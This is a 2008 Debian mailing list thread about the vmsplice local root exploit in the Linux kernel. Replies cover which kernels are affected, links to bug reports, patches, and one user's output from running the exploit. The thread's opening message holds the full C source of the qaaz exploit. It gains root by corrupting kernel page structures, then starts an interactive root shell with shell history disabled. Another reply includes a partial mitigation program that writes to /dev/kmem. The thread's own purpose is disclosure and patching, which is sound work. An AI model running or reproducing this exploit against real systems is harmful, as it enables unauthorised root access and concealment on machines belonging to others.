Re: Serious local root exploit in linux kernel

2008-02-11 Thread Sarunas Burdulis 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

GaRaGeD Style wrote:
> Any Idea on why it doesn't work on a 2.6.18-openvz-13-1etch5-686 kernel ?
> 
> I tested 2 boxes and 2 variants of exploits, none worked.
> 
> I will take care of the "normal" ones :)
> 
> Max

Doesn't work on Xen-modified kernels either.

Sarunas
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHsITIejaFVltl6E8RAqJTAJ9YDzwPsYHv3veIGke/k2eYLdXZVwCgjd/q
WVJQw8/lcxZImIZ9ZZHbZyI=
=aIbl
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Serious local root exploit in linux kernel

2008-02-11 Thread Vincent Lefevre 
On 2008-02-11 14:26:59 +0100, Rorist wrote:
> Just tried on 2.6.23-1-amd64 and it works.

This is strange because here it doesn't work:

vin:~tmp> uname -a
Linux vin 2.6.23.13-ws-intel64-p4 #1 SMP PREEMPT Mon Jan 28 23:40:29 CET 2008 
x86_64 GNU/Linux
vin:~tmp> ./root_expl
---
 Linux vmsplice Local Root Exploit
 By qaaz
---
[+] mmap: 0x1000 .. 0x10001000
[+] page: 0x1000
[+] page: 0x1038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b1c1cef1000 .. 0x2b1c1cf23000
zsh: illegal hardware instruction (core dumped)  ./root_expl

-- 
Vincent Lefèvre <[EMAIL PROTECTED]> - Web: 
100% accessible validated (X)HTML - Blog: 
Work: CR INRIA - computer arithmetic / Arenaire project (LIP, ENS-Lyon)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Serious local root exploit in linux kernel

2008-02-11 Thread Douglas A. Tutty 
On Mon, Feb 11, 2008 at 10:52:57AM -0500, Kamaraju S Kusumanchi wrote:
 
> I am wondering what would be a good way to keep abreast of these kind of
> serious vulnerabilities. How did you come to know of this information? Is
> there any mailing list that I could subscribe? or there is a better
> alternative?

Well, I've found that by the time a confirmed fix is agreed to on
mailing lists, there's a fixed kernel available from
security.debian.org.  So, I subscribe to the security announce list and
then do an upgrade as soon as it is announced.  

The really scary part is the frequency of security updates to both the
kernel and iceweasel.  It reinforces the idea that the security of a box
is the lesser of the security of:
1.  the networks to which it is connected
2.  the users
3.  the administrator
4.  the physical box.

Therefore, the most secure box in relation to the user is one without
network connection, which is only operated by the administrator who is
also guarding it 24/7.  Anything less than this, and the user has to
trust somebody as much or more than themselves.

For 1 and 2, I trust security.debian


Doug.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Serious local root exploit in linux kernel

2008-02-11 Thread GaRaGeD Style 
Any Idea on why it doesn't work on a 2.6.18-openvz-13-1etch5-686 kernel ?

I tested 2 boxes and 2 variants of exploits, none worked.

I will take care of the "normal" ones :)

Max
--

Re: Serious local root exploit in linux kernel

2008-02-11 Thread Kamaraju S Kusumanchi 
Raj Kiran Grandhi wrote:

> Please see:
> 
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464945
> https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587
> https://bugzilla.redhat.com/show_bug.cgi?id=432229
> 

Scary, indeed! Thanks for informing.

I am wondering what would be a good way to keep abreast of these kind of
serious vulnerabilities. How did you come to know of this information? Is
there any mailing list that I could subscribe? or there is a better
alternative?

thanks
raju

-- 
Kamaraju S Kusumanchi
http://www.people.cornell.edu/pages/kk288/
http://malayamaarutham.blogspot.com/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Serious local root exploit in linux kernel

2008-02-11 Thread Kumar Appaiah 
On Mon, Feb 11, 2008 at 07:08:17PM +0530, Kumar Appaiah wrote:
> On Mon, Feb 11, 2008 at 02:07:41PM +0100, Vincent Lefevre wrote:
> > > A local root exploit has been discovered in the linux kernel yesterday.  
> > > Virtually all the stock kernels provided by several distributions in the  
> > > past year appear to be vulnerable.
> > 
> > Is it specific to x86 (not x86_64) as the exploit contains x86 code,
> > or are other architectures also vulnerable in some other way?
> 
> You can get the list of architectures for which built kernels were
> uploaded here:
> 
> http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=72;bug=464945

Er, I apologise. This was not the answer to the question asked.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036


signature.asc
Description: Digital signature

Re: Serious local root exploit in linux kernel

2008-02-11 Thread Kumar Appaiah 
On Mon, Feb 11, 2008 at 02:07:41PM +0100, Vincent Lefevre wrote:
> > A local root exploit has been discovered in the linux kernel yesterday.  
> > Virtually all the stock kernels provided by several distributions in the  
> > past year appear to be vulnerable.
> 
> Is it specific to x86 (not x86_64) as the exploit contains x86 code,
> or are other architectures also vulnerable in some other way?

You can get the list of architectures for which built kernels were
uploaded here:

http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=72;bug=464945

HTH.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036


signature.asc
Description: Digital signature

Re: Serious local root exploit in linux kernel

2008-02-11 Thread Rorist 
Hello,

Just tried on 2.6.23-1-amd64 and it works.


> On Feb 11, 2008 2:07 PM, Vincent Lefevre <[EMAIL PROTECTED]> wrote:
> > On 2008-02-11 07:17:08 +0530, Raj Kiran Grandhi wrote:
> > > A local root exploit has been discovered in the linux kernel yesterday.
> > > Virtually all the stock kernels provided by several distributions in the
> > > past year appear to be vulnerable.
> >
> > Is it specific to x86 (not x86_64) as the exploit contains x86 code,
> > or are other architectures also vulnerable in some other way?
> >
> > --
> > Vincent Lefèvre <[EMAIL PROTECTED]> - Web: 
> > 100% accessible validated (X)HTML - Blog: 
> > Work: CR INRIA - computer arithmetic / Arenaire project (LIP, ENS-Lyon)
> >
> >
> >
> > --
> > To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
> >
> >
>
>
>
> --
> Aubort Jean-Baptiste
> ziki: http://my.ziki.com/rorist
>



-- 
Aubort Jean-Baptiste
ziki: http://my.ziki.com/rorist

Re: Serious local root exploit in linux kernel

2008-02-11 Thread Rorist 
Hello,

Just tried on 2.6.23-1-amd64 and it works.


On Feb 11, 2008 2:07 PM, Vincent Lefevre <[EMAIL PROTECTED]> wrote:
> On 2008-02-11 07:17:08 +0530, Raj Kiran Grandhi wrote:
> > A local root exploit has been discovered in the linux kernel yesterday.
> > Virtually all the stock kernels provided by several distributions in the
> > past year appear to be vulnerable.
>
> Is it specific to x86 (not x86_64) as the exploit contains x86 code,
> or are other architectures also vulnerable in some other way?
>
> --
> Vincent Lefèvre <[EMAIL PROTECTED]> - Web: 
> 100% accessible validated (X)HTML - Blog: 
> Work: CR INRIA - computer arithmetic / Arenaire project (LIP, ENS-Lyon)
>
>
>
> --
> To UNSUBSCRIBE, email to [EMAIL PROTECTED]
> with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
>
>



-- 
Aubort Jean-Baptiste
ziki: http://my.ziki.com/rorist

Re: Serious local root exploit in linux kernel

2008-02-11 Thread Vincent Lefevre 
On 2008-02-11 07:17:08 +0530, Raj Kiran Grandhi wrote:
> A local root exploit has been discovered in the linux kernel yesterday.  
> Virtually all the stock kernels provided by several distributions in the  
> past year appear to be vulnerable.

Is it specific to x86 (not x86_64) as the exploit contains x86 code,
or are other architectures also vulnerable in some other way?

-- 
Vincent Lefèvre <[EMAIL PROTECTED]> - Web: 
100% accessible validated (X)HTML - Blog: 
Work: CR INRIA - computer arithmetic / Arenaire project (LIP, ENS-Lyon)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Serious local root exploit in linux kernel

2008-02-11 Thread Jaime Tarrant 

Jeff D wrote:

Raj Kiran Grandhi wrote:

Please see:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464945
https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587
https://bugzilla.redhat.com/show_bug.cgi?id=432229

A local root exploit has been discovered in the linux kernel 
yesterday. Virtually all the stock kernels provided by several 
distributions in the past year appear to be vulnerable.


I am still hinting for a temporary fix, but till that I guess I'll 
have to disable login access to all but a handful of absolutely 
trusted users.


I have attached a proof-of-concept source code that can be found in 
the bug reports.


Too scary!





On kernels I compile myself, I just applied the patch from here:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=712a30e63c8066ed84385b12edbfb804f49cbc44 



recompiled my kernel, and exploit no longer works.




I applied the patch recommended by Jeff D to Debian kernel 2.6.24.1 and 
it worked. Thanks!


There is also a related patch for completeness (for kernels 2.6.23.x and 
up I believe)


http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=8811930dc74a503415b35c4a79d14fb0b408a361


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Serious local root exploit in linux kernel

2008-02-10 Thread Jeff D 

Raj Kiran Grandhi wrote:

Please see:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464945
https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587
https://bugzilla.redhat.com/show_bug.cgi?id=432229

A local root exploit has been discovered in the linux kernel yesterday. 
Virtually all the stock kernels provided by several distributions in the 
past year appear to be vulnerable.


I am still hinting for a temporary fix, but till that I guess I'll have 
to disable login access to all but a handful of absolutely trusted users.


I have attached a proof-of-concept source code that can be found in the 
bug reports.


Too scary!





On kernels I compile myself, I just applied the patch from here:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=712a30e63c8066ed84385b12edbfb804f49cbc44

recompiled my kernel, and exploit no longer works.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Serious local root exploit in linux kernel

2008-02-10 Thread Raj Kiran Grandhi 

Raj Kiran Grandhi wrote:

Please see:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464945
https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587
https://bugzilla.redhat.com/show_bug.cgi?id=432229

A local root exploit has been discovered in the linux kernel yesterday. 
Virtually all the stock kernels provided by several distributions in the 
past year appear to be vulnerable.


I am still hinting for a temporary fix, but till that I guess I'll have 
to disable login access to all but a handful of absolutely trusted users.


I have attached a proof-of-concept source code that can be found in the 
bug reports.


Too scary!



The attached file pulled from the debian bug report page fixes the issue 
till the next reboot.


--
Raj Kiran Grandhi
/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define __KERNEL__
#include 

#define PIPE_BUFFERS16
#define PG_compound 14
#define uintunsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)(x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

voidexit_code();
charexit_stack[1024 * 1024];

voiddie(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

voidkernel_code()
{
int i;
uint*p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}   

exit_kernel();
}

voidde_exploit()
{
  char line[4096];
  FILE* ksyms = fopen("/proc/kallsyms", "r");
  size_t address = 0;

  if(!ksyms)
  {
perror("Could not open /proc/kallsyms");

exit(EXIT_FAILURE);
  }

  while(fgets(line, sizeof(line), ksyms))
  {
if(strstr(line, " sys_vmsplice"))
{
  sscanf(line, "%zx", &address);

  break;
}
  }

  if(!address)
  {
fprintf(stderr, "Address not found\n");

exit(EXIT_FAILURE);
  }

  int fd = open("/dev/kmem", O_RDWR);

  if(fd == -1)
  {
perror("open(\"/dev/kmem\")");

exit(EXIT_FAILURE);
  }

  char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd, address & ~0xFFF);

  if(map == MAP_FAILED)
  {
perror("mmap");

exit(

Serious local root exploit in linux kernel

2008-02-10 Thread Raj Kiran Grandhi 

Please see:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464945
https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587
https://bugzilla.redhat.com/show_bug.cgi?id=432229

A local root exploit has been discovered in the linux kernel yesterday. 
Virtually all the stock kernels provided by several distributions in the 
past year appear to be vulnerable.


I am still hinting for a temporary fix, but till that I guess I'll have 
to disable login access to all but a handful of absolutely trusted users.


I have attached a proof-of-concept source code that can be found in the 
bug reports.


Too scary!


--
Raj Kiran Grandhi


/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define __KERNEL__
#include 

#define PIPE_BUFFERS	16
#define PG_compound	14
#define uint		unsigned int
#define static_inline	static inline __attribute__((always_inline))
#define STACK(x)	(x + sizeof(x) - 40)

struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};

void	exit_code();
char	exit_stack[1024 * 1024];

void	die(char *msg, int err)
{
	printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	316
#endif

#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"
	"movl %1, 0x0c(%%esp) ;"
	"movl %2, 0x08(%%esp) ;"
	"movl %3, 0x04(%%esp) ;"
	"movl %4, 0x00(%%esp) ;"
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	"i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	278
#endif

#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"
	"movq %1, 0x18(%%rsp) ;"
	"movq %2, 0x10(%%rsp) ;"
	"movq %3, 0x08(%%rsp) ;"
	"movq %4, 0x00(%%rsp) ;"
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	"i" (USER_CS), "r" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice	__NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)	syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid &&
		p[2] == uid && p[3] == uid &&
		p[4] == gid && p[5] == gid &&
		p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}	

	exit_kernel();
}

void	exit_code()
{
	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
}

int	main(int argc, char *argv[])
{
	int		pi[2];
	size_t		map_size;
	char *		map_addr;
	struct iovec	iov;
	struct page *	pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("---\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("---\n");

	if (!uid || !gid)
		die("[EMAIL PROTECTED]", 0);

	/*/
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[0]);
	printf("[+] page: 0x%lx\n", pages[1]);

	pages[0]->flags= 1 << PG_compound;
	pages[0]->private  = (unsigned long) pages[0];
	pages[0]->count= 1;
	pages[1]->lru.next = (long) kernel_code;

	/*/
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size